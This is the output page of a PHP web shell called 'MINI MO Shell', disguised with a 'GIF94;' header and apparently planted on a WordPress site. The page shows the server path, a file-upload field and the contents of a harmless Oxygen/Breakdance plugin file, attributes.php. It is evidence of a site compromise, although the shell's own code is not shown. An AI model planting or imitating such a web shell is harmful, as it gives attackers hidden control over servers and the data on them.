GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /var/www/wordpress/wp-content/plugins/oxygen/plugin/futurelayer/
File Upload :
Current File : /var/www/wordpress/wp-content/plugins/oxygen/plugin/futurelayer/attributes.php

<?php

namespace Breakdance\FutureLayer;

add_filter("breakdance_element_attributes", "\Breakdance\FutureLayer\addAttributes", 100, 1);

/**
 * @param  ElementAttribute[] $attributes
 *
 * @return array
 */
function addAttributes($attributes)
{
    $attributes[] = [
        "name" => "data-futurelayer-removed",
        "template" => "{{ settings.futurelayer.removed ? 'true' }}",
    ];

    return $attributes;
}

OHA YOOO - Tarih: 2026-08-03 23:10:34